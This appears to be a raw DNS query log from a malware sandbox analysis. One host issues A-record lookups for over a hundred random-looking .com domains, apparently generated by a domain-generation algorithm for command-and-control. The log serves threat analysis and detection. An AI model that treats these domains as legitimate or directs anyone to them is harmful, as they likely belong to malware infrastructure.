                                                                                                                                                                                                          Sep 8, 2024 10:54:18.730406046 CEST192.168.2.91.1.1.10xf5e4Standard query (0)lyrynad.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.734497070 CEST192.168.2.91.1.1.10x78bStandard query (0)vonydik.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.735188007 CEST192.168.2.91.1.1.10xff32Standard query (0)pujylog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.737905979 CEST192.168.2.91.1.1.10xc282Standard query (0)lygyjuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.738734007 CEST192.168.2.91.1.1.10x309aStandard query (0)vofyqit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.738807917 CEST192.168.2.91.1.1.10xf292Standard query (0)puzyxyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.739784956 CEST192.168.2.91.1.1.10xa9b8Standard query (0)gadyquz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.740231037 CEST192.168.2.91.1.1.10xd01eStandard query (0)lymyfoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.741568089 CEST192.168.2.91.1.1.10x8939Standard query (0)pumydoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.743910074 CEST192.168.2.91.1.1.10x302bStandard query (0)volyzef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.744091034 CEST192.168.2.91.1.1.10x9b6fStandard query (0)qekylag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748126984 CEST192.168.2.91.1.1.10x940aStandard query (0)lysymux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748730898 CEST192.168.2.91.1.1.10x5f5fStandard query (0)galyzeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.748950958 CEST192.168.2.91.1.1.10xfbeeStandard query (0)vojykom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.750746965 CEST192.168.2.91.1.1.10x2e51Standard query (0)pupymyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.750929117 CEST192.168.2.91.1.1.10x3608Standard query (0)gacypyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.751094103 CEST192.168.2.91.1.1.10x4ff2Standard query (0)ganydiw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.751616001 CEST192.168.2.91.1.1.10x5f75Standard query (0)lyxyxyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.752652884 CEST192.168.2.91.1.1.10x278aStandard query (0)vopymyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.752916098 CEST192.168.2.91.1.1.10xf9aeStandard query (0)qebysul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.753098965 CEST192.168.2.91.1.1.10xddc0Standard query (0)qexytep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.761668921 CEST192.168.2.91.1.1.10xb761Standard query (0)qedyqup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.761857033 CEST192.168.2.91.1.1.10x3477Standard query (0)gatynes.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.770375967 CEST192.168.2.91.1.1.10x9852Standard query (0)lyvysur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.770685911 CEST192.168.2.91.1.1.10x2cd9Standard query (0)lykylan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.780577898 CEST192.168.2.91.1.1.10x904dStandard query (0)puvypul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.780772924 CEST192.168.2.91.1.1.10xa60Standard query (0)lyxytex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.783931017 CEST192.168.2.91.1.1.10xf66eStandard query (0)vocypyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784470081 CEST192.168.2.91.1.1.10xd6a1Standard query (0)qegykiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784698963 CEST192.168.2.91.1.1.10x750bStandard query (0)qetynev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784802914 CEST192.168.2.91.1.1.10xef65Standard query (0)gaqyvob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784876108 CEST192.168.2.91.1.1.10x250dStandard query (0)vowybof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.784997940 CEST192.168.2.91.1.1.10x8a20Standard query (0)pufyjuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785082102 CEST192.168.2.91.1.1.10x4c31Standard query (0)pumycug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785186052 CEST192.168.2.91.1.1.10x1c0cStandard query (0)vofyjuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785264969 CEST192.168.2.91.1.1.10xe641Standard query (0)puzytap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785547018 CEST192.168.2.91.1.1.10xef9dStandard query (0)qeqyvig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785716057 CEST192.168.2.91.1.1.10x6e97Standard query (0)gadyhyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785831928 CEST192.168.2.91.1.1.10x24afStandard query (0)gahykih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.785878897 CEST192.168.2.91.1.1.10x629aStandard query (0)volyrac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.786071062 CEST192.168.2.91.1.1.10x52bStandard query (0)lysyger.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.786936998 CEST192.168.2.91.1.1.10x801Standard query (0)purybav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:18.804517031 CEST192.168.2.91.1.1.10x8e3fStandard query (0)lymyvin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.570903063 CEST192.168.2.91.1.1.10xe7e2Standard query (0)lymyxex.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.581473112 CEST192.168.2.91.1.1.10x47f9Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.583278894 CEST192.168.2.91.1.1.10x237cStandard query (0)pumyxep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.588428974 CEST192.168.2.91.1.1.10xa176Standard query (0)vonyzac.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.602216005 CEST192.168.2.91.1.1.10x3331Standard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.604046106 CEST192.168.2.91.1.1.10x6418Standard query (0)galyquw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.609395027 CEST192.168.2.91.1.1.10xf888Standard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.611663103 CEST192.168.2.91.1.1.10xa55dStandard query (0)ganypeb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.612281084 CEST192.168.2.91.1.1.10x5289Standard query (0)gadyneh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.613593102 CEST192.168.2.91.1.1.10xf03fStandard query (0)gaqydus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.614145041 CEST192.168.2.91.1.1.10x501cStandard query (0)qeqysuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.614721060 CEST192.168.2.91.1.1.10xc7c3Standard query (0)pufymyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.615883112 CEST192.168.2.91.1.1.10xc97fStandard query (0)vofymem.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.617574930 CEST192.168.2.91.1.1.10x626fStandard query (0)pumypyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.618195057 CEST192.168.2.91.1.1.10x3535Standard query (0)qexylal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.620403051 CEST192.168.2.91.1.1.10xef38Standard query (0)gacyzaw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.621526957 CEST192.168.2.91.1.1.10x674aStandard query (0)lygymyn.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.622978926 CEST192.168.2.91.1.1.10xcbcStandard query (0)qedynaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.624057055 CEST192.168.2.91.1.1.10x980fStandard query (0)purydip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.625096083 CEST192.168.2.91.1.1.10xec35Standard query (0)qegyqug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.625605106 CEST192.168.2.91.1.1.10xcc6aStandard query (0)vocyzek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.626652956 CEST192.168.2.91.1.1.10xb6bfStandard query (0)qekykup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.627223969 CEST192.168.2.91.1.1.10x1339Standard query (0)vopybok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.628807068 CEST192.168.2.91.1.1.10x90e8Standard query (0)vonypyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.630790949 CEST192.168.2.91.1.1.10x3a3eStandard query (0)qetyvil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.637098074 CEST192.168.2.91.1.1.10x28e7Standard query (0)lysynaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.639367104 CEST192.168.2.91.1.1.10x81b4Standard query (0)lyvytan.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.639539003 CEST192.168.2.91.1.1.10x42f6Standard query (0)pujywiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.639858007 CEST192.168.2.91.1.1.10x663eStandard query (0)gatyfaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.640165091 CEST192.168.2.91.1.1.10xd7e9Standard query (0)gatyviw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.642530918 CEST192.168.2.91.1.1.10xd623Standard query (0)lyvyxyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.642781973 CEST192.168.2.91.1.1.10xbc08Standard query (0)pujyjup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.643024921 CEST192.168.2.91.1.1.10xecf3Standard query (0)qebyteg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.643807888 CEST192.168.2.91.1.1.10x5bbbStandard query (0)puzylol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.651288033 CEST192.168.2.91.1.1.10x2e2fStandard query (0)lyxylor.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.651515007 CEST192.168.2.91.1.1.10x36fdStandard query (0)vojyjyc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.651688099 CEST192.168.2.91.1.1.10x4039Standard query (0)vojyquf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.652514935 CEST192.168.2.91.1.1.10xc797Standard query (0)lysyfin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.661616087 CEST192.168.2.91.1.1.10xf5d5Standard query (0)puzywuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.661787987 CEST192.168.2.91.1.1.10x5a11Standard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.661874056 CEST192.168.2.91.1.1.10xbdacStandard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663011074 CEST192.168.2.91.1.1.10x993fStandard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663223982 CEST192.168.2.91.1.1.10xf2cdStandard query (0)lymysud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663311005 CEST192.168.2.91.1.1.10x40d7Standard query (0)volykit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663486958 CEST192.168.2.91.1.1.10x65d4Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663665056 CEST192.168.2.91.1.1.10xc9b2Standard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663800955 CEST192.168.2.91.1.1.10xd13aStandard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.663957119 CEST192.168.2.91.1.1.10x401dStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664120913 CEST192.168.2.91.1.1.10x3559Standard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664268970 CEST192.168.2.91.1.1.10xc4d3Standard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664298058 CEST192.168.2.91.1.1.10x87f7Standard query (0)qedyfog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664427042 CEST192.168.2.91.1.1.10xedd7Standard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664546967 CEST192.168.2.91.1.1.10x19b1Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.664637089 CEST192.168.2.91.1.1.10x3b67Standard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.666069984 CEST192.168.2.91.1.1.10x1660Standard query (0)qetyfop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.666497946 CEST192.168.2.91.1.1.10xccb6Standard query (0)gahyqub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.670886040 CEST192.168.2.91.1.1.10x13d8Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.671149015 CEST192.168.2.91.1.1.10x5575Standard query (0)pupyboq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.675982952 CEST192.168.2.91.1.1.10x1e9Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.676870108 CEST192.168.2.91.1.1.10x8aefStandard query (0)galykiz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.676968098 CEST192.168.2.91.1.1.10x2881Standard query (0)vowydic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.677047968 CEST192.168.2.91.1.1.10x63ddStandard query (0)lykyjux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.677146912 CEST192.168.2.91.1.1.10x7017Standard query (0)puvyxeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:19.677202940 CEST192.168.2.91.1.1.10x53e4Standard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.667628050 CEST192.168.2.91.1.1.10x3b9aStandard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.667792082 CEST192.168.2.91.1.1.10x2459Standard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.677196980 CEST192.168.2.91.1.1.10x239cStandard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.679851055 CEST192.168.2.91.1.1.10xaf24Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.680449009 CEST192.168.2.91.1.1.10xf5ecStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681027889 CEST192.168.2.91.1.1.10xbc54Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681258917 CEST192.168.2.91.1.1.10xb2d7Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681708097 CEST192.168.2.91.1.1.10x6cbeStandard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.681737900 CEST192.168.2.91.1.1.10xd11cStandard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.682246923 CEST192.168.2.91.1.1.10x4860Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.682471991 CEST192.168.2.91.1.1.10xca0aStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.683506966 CEST192.168.2.91.1.1.10x27c2Standard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.683541059 CEST192.168.2.91.1.1.10xf20fStandard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.684585094 CEST192.168.2.91.1.1.10x60ddStandard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.685456991 CEST192.168.2.91.1.1.10x43f4Standard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.685796022 CEST192.168.2.91.1.1.10x925dStandard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.685832024 CEST192.168.2.91.1.1.10xb8f4Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.686414957 CEST192.168.2.91.1.1.10x8652Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.686672926 CEST192.168.2.91.1.1.10xad2cStandard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.686892986 CEST192.168.2.91.1.1.10xd730Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.687210083 CEST192.168.2.91.1.1.10x21b5Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.687715054 CEST192.168.2.91.1.1.10x638eStandard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.688721895 CEST192.168.2.91.1.1.10x2d9aStandard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.691124916 CEST192.168.2.91.1.1.10xbfa2Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.691868067 CEST192.168.2.91.1.1.10x583cStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.694843054 CEST192.168.2.91.1.1.10xb3c4Standard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.700905085 CEST192.168.2.91.1.1.10x9ecbStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.704210997 CEST192.168.2.91.1.1.10x2cacStandard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.705326080 CEST192.168.2.91.1.1.10x81e7Standard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.710743904 CEST192.168.2.91.1.1.10xb837Standard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.713314056 CEST192.168.2.91.1.1.10xd2fbStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.713489056 CEST192.168.2.91.1.1.10xfcc5Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.729156971 CEST192.168.2.91.1.1.10xf63Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.731163025 CEST192.168.2.91.1.1.10x5ab3Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.731775999 CEST192.168.2.91.1.1.10xaa29Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.733995914 CEST192.168.2.91.1.1.10x77fbStandard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.735116005 CEST192.168.2.91.1.1.10xa693Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.735850096 CEST192.168.2.91.1.1.10xfe4eStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.736519098 CEST192.168.2.91.1.1.10x8a7Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.737396002 CEST192.168.2.91.1.1.10x9e0Standard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.738671064 CEST192.168.2.91.1.1.10x6c3eStandard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.739741087 CEST192.168.2.91.1.1.10x79b1Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.740585089 CEST192.168.2.91.1.1.10x92d7Standard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.754628897 CEST192.168.2.91.1.1.10x8063Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.754873991 CEST192.168.2.91.1.1.10xeb18Standard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755140066 CEST192.168.2.91.1.1.10x8f79Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755285978 CEST192.168.2.91.1.1.10x61bfStandard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755474091 CEST192.168.2.91.1.1.10x5a6eStandard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755567074 CEST192.168.2.91.1.1.10x8cdaStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755776882 CEST192.168.2.91.1.1.10x1e83Standard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.755842924 CEST192.168.2.91.1.1.10x4226Standard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.756053925 CEST192.168.2.91.1.1.10xc7fcStandard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.756329060 CEST192.168.2.91.1.1.10xa5d0Standard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.756477118 CEST192.168.2.91.1.1.10xccd7Standard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.756702900 CEST192.168.2.91.1.1.10x9fecStandard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.757004976 CEST192.168.2.91.1.1.10x235Standard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.757095098 CEST192.168.2.91.1.1.10xe6c9Standard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.757265091 CEST192.168.2.91.1.1.10xa3b4Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.757359982 CEST192.168.2.91.1.1.10x8ab6Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.757658958 CEST192.168.2.91.1.1.10x90e5Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.758367062 CEST192.168.2.91.1.1.10x4e44Standard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.758507967 CEST192.168.2.91.1.1.10xe8c0Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.759129047 CEST192.168.2.91.1.1.10xf8e1Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:21.759179115 CEST192.168.2.91.1.1.10x7983Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.843791008 CEST192.168.2.91.1.1.10xf6a3Standard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.856514931 CEST192.168.2.91.1.1.10xcd7fStandard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.857386112 CEST192.168.2.91.1.1.10xbd9dStandard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.860759974 CEST192.168.2.91.1.1.10x24f1Standard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.860985994 CEST192.168.2.91.1.1.10xcffcStandard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.873033047 CEST192.168.2.91.1.1.10xed66Standard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.879394054 CEST192.168.2.91.1.1.10x425eStandard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.879590034 CEST192.168.2.91.1.1.10xbce1Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.880294085 CEST192.168.2.91.1.1.10xd3dcStandard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:54:22.880883932 CEST192.168.2.91.1.1.10x8409Standard query (0)volymaf.comA (IP address)IN (0x0001)false
